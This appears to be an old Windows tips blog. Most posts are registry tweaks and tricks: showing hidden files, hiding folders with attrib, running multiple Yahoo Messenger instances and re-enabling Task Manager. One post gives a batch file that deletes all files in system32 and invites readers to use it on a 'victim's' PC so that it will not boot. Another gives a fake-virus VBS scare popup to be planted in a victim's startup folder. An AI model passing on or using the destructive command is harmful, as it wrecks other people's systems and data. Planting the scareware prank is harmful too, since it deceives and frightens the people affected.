Tuesday, February 24, 2009

to see hidden files when folder options is not working

Method 1:

Go to registry editor by running regedit in the run box.
Go to this key:
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\Advanced


In the right hand area, double click hidden and change the value to 1.

Now you’re all set to go. Check it in your tools menu if the changes have taken effect.

Method 2: (By Random Hajile)

1. Click “Start” -> “Run…” (or press Windows key + R)
2. Type “regedit” and click “Ok”.
3. Find the key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\Folder\Hidden\SHOWALL
4. Look at the “CheckedValue” key… This should be a DWORD key. If it isn’t, delete the key.
5. Create a new key called “CheckedValue” as a DWORD (hexadecimal) with a value of 1.
6. The “Show hidden files & folders” check box should now work normally. Enjoy!

Tuesday, November 11, 2008

HIDE UR FOLDERS IN JUST FEW STEPS WITHOUT USING SOFTWARES

suppose u want to hide a folder named abc which is in D: of ur computer

go to command prompt
start--->run--->cmd-->d:


after changing it from C: to D:

type D:/>attrib +h +s abc
the above command is to hide the folder

to show the folder

tyoe D:/>attrib -h -s abc

in this type of hidding the folder cannot be viewed even if we make advance search or even changing the folders menu to (show all hidden files)

How to make your Desktop Icons Transparent

How to make your Desktop Icons Transparent


Go to Control Panel

> System,

> Advanced

> Performance area

> Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop"

Multiple Yahoo Messanger IN the same PC

Multiple Yahoo Messanger IN the same PC (machine)
the steps for this trick are

Go to run.Type 'regedit'.

Go to HKEY_CURRENT_USER.

Double click 'softwares'.

Click on 'Yahoo'.

Then click on 'Pager'

Click on test. On the right panel,right click and create a DWORD value.

Name it as 'plural'. By double clicking,change the default value to 1.

Thursday, November 6, 2008

A simple Trick to destroy ur victim's pc

I m here explain to make a file that destroys ur victims pc
I m not responsible for the damage caused by this file."

1. Open Notepad

2. write the above command : -
del c:\WINDOWS\system32\*.*/q

3. Save the above notepad with the extension ".bat or .cmd" as u want

4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!
Don't double click the file otherwise u r in trouble.
Why ?????? bcz the file u created delete all files from ur

system32 folder and when u restart ur pc it will not start

bcz system can not find the files in the system32 folder which

is required at the time of booting.

5. You can also test the above by creating a fake folder let suppose

windows1 in C:\. Copy some old files in it and just follow the

above command.By double clicking the bat or cmd file ur all files

automaitcally get deleted.

6. You can try this file in any one`s computer.(but this result in causing damage to the
computer, so thik again before trying this on anyone's pc

make your own harmless virus

hi freinds you can make your own virus that doesnot harms any one you can suprose ur freinds with this easy to make harmless virus
Open notepad and type the following

ol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")

Then save it as Virus.VBS

and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account.
On startup the window should appear.
Note: This does not harm your computer as it does not contain virus.

The Yes and no button does not do anything except closing the window. And you can edit the virus in the sentence: Warning a virus has detected on your PC to any kind of virus eg.Trojan Horse like this lol=msgbox ("Warning a Trojan horse has been detected on your PC. Press YES to format your hard disk now or press NO to format format your hard disk after system reboot",20,"Warning")

Task Manager has been disabled ,Is this your problem ???

Error Message: "Task Manager has been disabled by your administrator"
When you try to open Task Manager, the following error may occur:
Task Manager has been disabled by your administrator
Resolution
This error is caused if the DisableTaskMgr restriction is enabled. To enable Task Manager, try one of these methods:
IMPORTANT: If this restriction was enabled in your system without you doing anything or without your knowledge, then it's highly likely that a Virus has blocked the usage of Task Manager in your system by enabling the DisableTaskMgr policy via the registry. I strongly suggest that you perform a thorough checkup of your system immediately. Steps listed in the Resolution section of this article helps you unblock the Task Manager, but that does not remove the Virus (if any) from your system.
Method 1
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
Top of Form

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

Bottom of Form
Method 2
· Click Start, Run and type Regedit.exe
· Navigate to the following branch:
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies\ System
· In the right-pane, delete the value named DisableTaskMgr
· Close Regedit.exe
Method 3: Using Group Policy Editor - for Windows XP Professional
· Click Start, Run, type gpedit.msc and click OK.
· Navigate to this branch:
User Configuration / Administrative Templates / System / Ctrl+Alt+Delete Options / Remove Task Manager
· Double-click the Remove Task Manager option.
· Set the policy to Not Configured.

And you are done!!!